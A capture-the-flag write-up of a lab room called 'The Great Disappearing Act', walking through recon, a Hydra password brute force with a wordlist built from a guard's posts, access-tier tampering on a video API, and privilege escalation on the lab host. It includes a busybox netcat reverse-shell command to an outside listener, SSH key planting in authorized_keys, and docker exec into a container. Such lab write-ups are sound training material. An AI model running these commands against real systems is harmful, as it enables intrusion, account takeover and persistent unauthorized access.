# The Great Disappearing Act {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** After we have disabled the firewall using the web server on port `21337`, we begin with the challenge. ## Recon We use rustscan `-b 500 -a 10.80.172.227 -- -sC -sV -Pn` to enumerate all TCP ports on the target machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`. A batch size of `500` trades speed for stability, the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability.

Our rustscan shows us that the target has several open ports. These include ports `22`, `80`, `8000`, `8080`, `9001`, and `13400`–`13404`. Port `21337` hosts the web server for disabling the firewall, so we leave this one out. At first glance, we can see that a web server is running on most ports. Only on port `9000` do we appear to be dealing with a SCADA terminal.

We first manually call up the web pages of the respective web services on the open ports. Ports `80` and `8080` appear to host the same page. Here we are presented with the login page for the HopSec Security Console. Later on, we will find out that we redeem our flags on this portal.

As it turned out during the challenge, the page on port `80` is not fully functional. In the further course of the challenge, we refer to the console on port `8080`.

On port `8000`, we are greeted with a login page for fakebook. Fakebook is a fake social media portal, which can also be found on GitHub. Explicit vulnerabilities of this portal are not within the scope of the challenge.

We can use netcat to connect to the SCADA terminal, which simulates the gate control system. ``` nc 10.80.172.227 9001 ```

The web server on port `13400` hosts a video portal, and here too we are required to log in first.

## Flag 1 Since the Fakebook page is the only one that allows us to create an account and perform some authenticated recon, we will start with this page. We create an account.

In one of the first posts on the portal, we discover the email address of the user Guard Hopkins, who shared it in a post. We'll make a note of that. ``` guard.hopkins@hopsecasylum.com ```

We scroll through the posts and see how Sir Carrotbane tricks users into sharing their passwords in the comments section. Guard Hopkins fell for it, and now we have his password. However, fater testing the credentials of Guard Hopkins on all available login pages we can confirm that he had already changed it everywhere..

The leaked password didn't work. But the user Hopkins provides enough material in his posts to create a word list.

The following screenshots illustrate the keywords we will use to create our word list.

We have noted the following: ``` Pizza Johnnyboy 43 anniversary 1982! 1234$ Hopkin ```

We also get a hint on how we could use this to create our word list. For example, with the combinator feature of hashcat, which creates all possible combinations of two lists into one list. The combinator mode can be applied in hashcat with `-a 1`.

We create a list of all the keywords we already know and clone them.

Next, we use the combinator feature to merge all combinations from both lists into one. ``` hashcat --stdout -a 1 list_a list_b > passwords.txt ```

Since we have the email and a set of passwords, we try to perform a dictionary attack on all portals using Hydra. Our first attempt on Fakebook failed, but we got a hit on HopSec Security Console. {% code overflow="wrap" %} ``` hydra -l 'guard.hopkins@hopsecasylum.com' -P passwords.txt 10.80.172.227 -s 8080 http-post-form "/cgi-bin/login.sh:username=^USER^&password=^PASS^:F=Invalid" ``` {% endcode %}

We log in...

... and find the facility map as in the room description.

When we click on the Cells / Storage key, we get the first flag.

## Flag 2 Part 1 With Guard Hopkins' credentials, we can also log in to the Facility Video Portal. ``` http://10.80.172.227:13400/ ```

However, all video recordings appear to be compromised...

... and access to the admin cam is restricted.

We intercept a request of clicking the cam-lobby using Burp Suite.

After we have forwarded the request, another request follows to `/v1/streams/request`, which requests the stream using a POST request. The camera ID and the tier are defined in the post body.

After we forward this request, another request follows, namely for the .m3u8 file. An M3U8 file is a playlist used for HTTP Live Streaming (HLS) that tells a media player where to find and play video or audio segments over the internet. It’s a text file encoded in UTF-8, commonly used by streaming platforms to deliver adaptive bitrate streams.

We repeat the whole process, but this time we forward the request to `/v1/streams/request` to the Burp Suite repeater. Here we see our effective tier as well as a ticket\_id as a response.

We'll take a look at the JavaScript of the portal, the core logic, namely main.js. Here we see the camera\_id `cam-admin`. ``` view-source:http://10.80.172.227:13400/main.js ```

When we request this `cam-admin`, we receive a ticket which, when we use it to play the stream (more on how we do this later), we find that the compromised video is still being played. Furthermore, we are still in the effective tier guard.

If we change the tier in the post body the effective tier stays the same and the ticket\_id still resutls in a compromised video.

To play the video, we take the ticket ID. ``` 0ffc7b3b-7674-49d5-a18e-07c4c8a61f73 ``` The site provides us with a function called `attachWithReconnect`, which we can use to play the video by passing the ticket ID. In the source, we also see the effective use of tiers guard and admin. We were probably not wrong about the tier labeling. ``` attachWithReconnect(API + '/v1/streams/' + j.ticket_id + '/manifest.m3u8'); ```

We execute this in the console with the ticket\_id resulting from the manipulated request. We see the compromised video. {% code overflow="wrap" %} ``` attachWithReconnect(API + '/v1/streams/' + '0ffc7b3b-7674-49d5-a18e-07c4c8a61f73' + '/manifest.m3u8'); ``` {% endcode %}

We are trying something new and not only setting the tier in the POST data but also in the GET request. This time, we receive a response confirming that we are indeed in the admin tier.

We copy the ticket\_id... ``` ab8a4a69-3774-43f6-80d3-b24a611e48a9 ``` ... and request the stream again in the console. We can see how a code is entered on a number pad. We write down the code. {% code overflow="wrap" %} ``` attachWithReconnect(API + '/v1/streams/' + 'ab8a4a69-3774-43f6-80d3-b24a611e48a9' + '/manifest.m3u8'); ``` {% endcode %}

We go back to the portal on port `8080` and try to open the second door (Psych Ward Exit). We enter the keycode.

And receive the fist part of the second flag. We may have overlooked something. We have not yet dealt with ports `13401`-`13404`.

## Flag 2 Part 2 We repeat the steps from earlier. We request the admin ticket for the cam-admin stream. And let's take a closer look at the manifest file.

From main.js, we can see how the URL for requesting the manifest file is constructed. In fact, it is accessed on port 13401. ``` API + '/v1/streams/' + 'add1bb80-63e7-4c47-8304-5341637b507d' + '/manifest.m3u8 ```

We craft the following url to request the manifest: {% code overflow="wrap" %} ``` http://10.80.172.227:13401/v1/streams/add1bb80-63e7-4c47-8304-5341637b507d/manifest.m3u8 ``` {% endcode %} We retrieve it. {% code overflow="wrap" %} ``` wget http://10.80.172.227:13401/v1/streams/add1bb80-63e7-4c47-8304-5341637b507d/manifest.m3u8 ``` {% endcode %}

In this, we find the following two endpoints: ``` /v1/ingest/diagnostics ``` ``` /v1/ingest/jobs ```

We cannot request `/v1/ingest/diagnostics` using a GET request.

But with a POST request, we receive an error stating that the rtsp\_url is invalid. An RTSP URL is used to control and stream live media (like IP cameras or live broadcasts) by telling a client where and how to access the stream. It works like a remote control for streaming, handling play, pause, and stop commands in real time. At first glance, nothing special. {% hint style="info" %} In the early version of the challenge for release, the note about the incorrect rtsp\_url was not included. Which made it particularly difficult. {% endhint %}

Localhost does not work.

But we have an example in the manfiest file.

IIf we use that we get a response witha `job_status` containing the other endpoint found in the manifest file.

When we request the following, we receive the information console port `13404` and a token. ``` /v1/ingest/jobs/5290b7f9-31ca-4815-af35-98323fe2597d ```

We connect to `13404` using netcat, but do not receive a prompt. When we enter the token, a terminal appears. ``` nc 10.80.172.227 13404 ```

We want a slightly more stable shell, so we set up a listener using penelope and prepare a reverse shell. ``` penelope -p 4445 ``` We spawn our reverse shell... ``` busybox nc 192.168.152.149 4445 -e /bin/bash ```

... receive a connection and continue.

At `/home/svc_vidpot/user.txt` we find the second part of the second flag.

## Flag 3 We remember the Scada portal, since we now have tokens like this one that we got for port `13404` and already have two flags, so let's try it out. With a flag we can authenticate but can't do much here.

We still have our shell for the second part of the flag. We search for SUID binaries and find on specifc. ``` find / -type f -perm -04000 2>/dev/null ```

It's `/usr/local/bin/diag_shell`. This is owned by dockermgr.

``` ls -lah /usr/local/bin/diag_shell ``` ``` /usr/local/bin/diag_shell ```

When we execute it, we get a shell in the context of dockermgr, but not fully. We are not in the dockermgr group and cannot use docker either.

However, since we can write to the home directory of dockermgr, we place our SSH pubkey in the `.ssh/authorized` file to obtain a more stable shell and a complete session as dockermgr. We generate a key pair. ``` ssh-keygen -t rsa ```

Next, write the public key to `.ssh/authorized_keys`. {% code overflow="wrap" %} ``` echo 'YOUR PUB KEY' > .ssh/authorized_keys ``` {% endcode %}

Now we can connect as dockermgr using SSH. We now have a stable session as dockermgr and can execute docker. Via docker ps we detect the `asylum_gate_control` image. If we can interact with it we could retrieve the passcode for the gate. ``` ssh -i id_rsa dockermgr@10.80.172.227 ```

We open an interactive bash shell inside the running Docker container named `asylum_gate_control`, allowing you to execute commands directly inside that container. ``` docker exec -it asylum_gate_control /bin/bash ``` There we inspect the source of the scada terminal... ``` cat scada_terminal.py ```

... and find the unlock code.

We enter the unlock code...

... and receive the final flag.

## Easter Egg After retrieving all flags a door appears on the facility map. If we click it we are tasked to provide each flag captured. If we do so we'll receive another flag and an invite page for the Hoppers Origins Side Side Quest.